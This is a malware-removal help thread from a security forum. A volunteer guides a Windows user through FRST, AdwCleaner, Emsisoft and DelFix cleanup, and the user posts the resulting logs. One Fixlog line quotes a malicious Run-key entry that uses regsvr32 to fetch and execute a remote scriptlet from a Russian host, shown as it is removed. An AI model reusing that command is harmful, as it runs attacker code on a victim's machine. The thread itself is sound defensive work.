Error: (09/19/2017 08:40:57 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:56 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server CortanaUI.AppXd4tad4d57t4wtdbnnmb8v2xtzym8c1n8.mca did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:54 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:54 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:10:36 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server microsoft.windowslive.calendar.AppXwkn9j84yh1kvnt49k5r8h6y1ecsv09hs.mca did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:10:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session4 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 

CodeIntegrity:
===================================
  Date: 2017-09-19 16:47:15.213
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-19 16:47:15.044
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-18 19:30:55.366
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-18 19:30:55.276
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-13 20:45:04.335
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-13 20:45:04.171
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-10 01:36:15.239
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-10 01:36:14.941
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-08 12:52:29.809
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-08 12:52:29.654
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 

==================== Memory info ===========================
 
Processor: Intel® Core™ i3-6006U CPU @ 2.00GHz
Percentage of memory in use: 68%
Total physical RAM: 3965.14 MB
Available physical RAM: 1267.59 MB
Total Virtual: 4669.14 MB
Available Virtual: 1650.97 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:100.02 GB) (Free:64.21 GB) NTFS
Drive d: ( ) (Fixed) (Total:276.97 GB) (Free:247.56 GB) NTFS
Drive e: ( ) (Fixed) (Total:276.97 GB) (Free:259.55 GB) NTFS
Drive f: ( ) (Fixed) (Total:277.43 GB) (Free:270.59 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1C99BC2F)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 



#3 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 20 September 2017 - 07:17 AM

Hello

  •   Welcome to Bleeping Computer.
  •   My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  •   Refrain from making any changes to your computer including installing/uninstall programs, deleting files, modifying the registry, and running scanners or tools.
  •   If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
  •   Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  •   In the upper right hand corner of the topic you will see a button called Follow This Topic.I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.
  •   Finally, please reply using the Post button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  •   I will be analyzing your log. I will get back to you with instructions.

1.

 

 
Download attached fixlist.txt file and save it to  the Desktop

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

Attached File  fixlist.txt   1.08KB   4 downloads

 

2.

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double-click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • The tool will start to update its database...please wait until complete.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button...a report (AdwCleaner[SX].txt) will open in Notepad (where the largest value of X represents the most recent report).
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles are saved to C:\AdwCleaner.

 

Things to include in your next reply::

fixlog.txt

AdwCleaner log

How is the computer running now? Any more signs of the infection?

 

 

 


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#4 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 24 September 2017 - 05:20 AM

Fix result of Farbar Recovery Scan Tool (x64) Version: 24-09-2017
Ran by Abhay (24-09-2017 15:32:06) Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Abhay (Available Profiles: Abhay)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=plk_coinisre_17_30_ssg01&cd=2XzuyEtN2Y1L1Qzu0A0AyC0B0A0DyDtByB0DyE0FtA0Fzy0FtN0D0Tzu0StBtDtAtBtN1L2XzutAtFtByBtFyEtFyDtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyBtCtBtBtD0CyEyEtGyDtD0A0FtGtA0F0A0AtGtDyDyB0EtGtCtCyCzyyBtA0B0C0B0DtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyByByBtB0DyC0D0CtGzztD0FyDtGyE0FtBtAtGzzyCyB0DtGtCyC0AzyyD0FtCyBtBzzyE0F2QtN0A0LzuyE&cr=410628304&ir=
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
IE trusted site: HKU\.DEFAULT\...\ncode.in -> hxxps://www.ncode.in
IE trusted site: HKU\.DEFAULT\...\ncodesolutions.com -> hxxps://www.ncodesolutions.com
IE trusted site: HKU\.DEFAULT\...\npay.in -> hxxps://www.npay.in
IE trusted site: HKU\.DEFAULT\...\nprocure.com -> hxxps://nprocure.com
Emptytemp:
*****************
 
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => value removed successfully
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\System\CurrentControlSet\Services\wfpcapture => key removed successfully
wfpcapture => service removed successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => key removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => key not found.
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ncode.in => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ncodesolutions.com => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\npay.in => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\nprocure.com => key removed successfully
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 334544 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 93889162 B
Java, Flash, Steam htmlcache => 56599034 B
Windows/system/drivers => 12678574 B
Edge => 2385456945 B
Chrome => 558261399 B
Firefox => 329268475 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 26702 B
Admin => 100288041 B
 
RecycleBin => 0 B
EmptyTemp: => 3.3 GB temporary data Removed.
 
================================
# AdwCleaner 7.0.2.1 - Logfile created on Sun Sep 24 10:16:51 2017
# Updated on 2017/29/08 by Malwarebytes
# Database: 09-23-2017.2
# Running on Windows 10 Enterprise (X64)
# Mode: scan
# Support: https://www.malwarebytes.com/support
 
***** [ Services ] *****
 
No malicious services found.
 
***** [ Folders ] *****
 
No malicious folders found.
 
***** [ Files ] *****
 
No malicious files found.
 
***** [ DLL ] *****
 
No malicious DLLs found.
 
***** [ WMI ] *****
 
No malicious WMI found.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts found.
 
***** [ Tasks ] *****
 
No malicious tasks found.
 
***** [ Registry ] *****
 
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\solvusoft.com
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.solvusoft.com
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\solvusoft.com
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.solvusoft.com
 

***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries.
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries.
 
*************************
 
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt ##########
 

The system needed a reboot.
 
==== End of Fixlog 15:34:40 ====
 
 
 

 



#5 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 24 September 2017 - 05:40 AM

AdwCleaner log
 
 
# AdwCleaner 7.0.2.1 - Logfile created on Sun Sep 24 10:28:01 2017
# Updated on 2017/29/08 by Malwarebytes
# Running on Windows 10 Enterprise (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support
 
***** [ Services ] *****
 
No malicious services deleted.
 
***** [ Folders ] *****
 
No malicious folders deleted.
 
***** [ Files ] *****
 
No malicious files deleted.
 
***** [ DLL ] *****
 
No malicious DLLs cleaned.
 
***** [ WMI ] *****
 
No malicious WMI cleaned.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts cleaned.
 
***** [ Tasks ] *****
 
No malicious tasks deleted.
 
***** [ Registry ] *****
 
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\solvusoft.com
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.solvusoft.com
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\solvusoft.com
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.solvusoft.com
 

***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries deleted.
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries deleted.
 
*************************
 
::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0
 
 
 
*************************
 
C:/AdwCleaner/AdwCleaner[S0].txt - [1825 B] - [2017/9/24 10:16:51]
 

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########



#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 27 September 2017 - 06:05 PM

How is your computer running now?


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#7 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 28 September 2017 - 06:44 AM

Perfect as it was.



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 28 September 2017 - 07:48 PM

Ok, let's run one more check for any remaining leftovers.

 

 

ZN3USrZ.png Emsisoft Emergency Kit

  • Click here to download Emsisoft Emergency Kit. The download will automatically start after a moment.
  • Save EmsisoftEmergencyKit.exe to your Desktop.
  • Double click on EmsisoftEmergencyKit.exe (Windows Vista/7/8 users: Accept UAC warning if it is enabled). A screen like this will appear:
    dQVDkTW.png
  • Leave everything as it is, then click Extract. This will unpack Emsisoft Emergency Kit to the EEK folder located in the root drive (usually C:\).
  • Once the extraction is done, an icon qwL1Upn.png will appear on your Desktop. Double click it to start Emsisoft Emergency Kit.
  • Wait for Emsisoft Emergency Kit to finish loading signatures. A screen like this should appear:
    yEgPemv.png
  • Choose Yes, then wait for EEK to finish updating.
  • Choose Malware Scan under the Scan button. When EEK asks to activate PUP detection, choose Yes.
  • Wait for the scan to finish.
    RUeRoi4.png
  • If EEK detects something, all detected items will be displayed. Place a checkmark before everything, then choose Quarantine Selected.
  • If Emsisoft Emergency Kit asks to reboot, please do so immediately.
  • The scan log is located in Logs -> Scan Logs. Click on the entry of the latest scan, choose Export and save the report on your Desktop.
    P7FSALs.png
  • Please Copy and Paste the contents of the scan log in your next reply.


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#9 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 29 September 2017 - 12:09 AM

Emsisoft Emergency Kit - Version 2017.8
Forensics log
 
Date Component Action Details
29/09/2017 10:12:38 AM Scanner Scan finished Scanned 142784 objects and found nothing.
29/09/2017 10:06:16 AM User Update Downloaded and installed 27 files (3244 kb) (1 min. 58 sec.).
29/09/2017 10:04:59 AM User DESKTOP-PL742CC\Abhay Scan started Malware Scan
29/09/2017 10:04:22 AM User DESKTOP-PL742CC\Abhay Setting modified "Detect PUPs" has been changed to "Enabled".
29/09/2017 10:04:19 AM Core Notification "Recommended Reading:New in 2017.8: Windows Firewall Fortification".
29/09/2017 10:04:10 AM User Update Failed with error "Server returned error" (0 sec.).


#10 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 29 September 2017 - 07:23 AM

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

BWuhenj.pngDelFix
Follow the instructions below to download and execute DelFix.

  • Download DelFix and move the executable to your Desktop
  • Right-click on DelFix.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Check the following options :
    • Activate UAC
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore
    • Reset system settings
  • Once all the options mentionned above are checked, click on Run
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply

Qt25440.pngTips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it that makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.


Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days) which is one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like eF2jhaz.pngUCheck, eLDnJfI.pngSecuniaPSI and y5YE7At.pngHeimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.


Anti-Virus, Anti-Malware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (which also includes an Anti-Virus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at the time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware are currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Anti-Virus


Anti-Malware


  • j1Bynr2.pngMalwarebytes - Has both a free and paid version. The Premium version of Malwarebytes also offers Exploit and Ransomware protection, for a complete package of: Malware, Web, Exploit and Ransomware protection
  • S2NFpNw.pngHitmanPro 3 - Free 30 day trial
  • ncqvIpu.pngZemana AntiMalware - Free 30 day trial

Firewall
Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.


  • 7p3JzTS.pngGlassWire - Has both a free and paid version (with different packages)
  • MQIMh6k.pngWindows Firewall Control - Gives you more control over your Windows Firewall
  • 5RXGshU.pngTinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it

Anti-Exploit/Anti-Ransomware


Web Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.


  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browsers)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point and click matrix-like extensions that allow you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)

As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:

As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far less chances to get infected by a malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you to avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :

The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you wont!), you can always comeback in this section to get another checkup with one of our trained malware removal member.

Do you have any questions before I close this thread?

 


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#11 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 29 September 2017 - 08:56 AM

 
 
 
# DelFix v1.013 - Logfile created 29/09/2017 at 19:24:11
# Updated 17/04/2016 by Xplode
# Username : Abhay - DESKTOP-PL742CC
# Operating System : Windows 10 Enterprise  (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Admin\Downloads\FRST-OlderVersion
Deleted : C:\Users\Admin\Downloads\Addition.txt
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #1 [Scheduled Checkpoint | 09/27/2017 18:10:44]
Deleted : RP #2 [Yo(1) | 09/28/2017 11:44:48]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########



#12 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 29 September 2017 - 08:59 AM

Anymore questions before I close this topic?


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#13 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 30 September 2017 - 12:14 AM

no thank you so muchh man!!!!!!!!



#14 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 04 October 2017 - 06:52 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users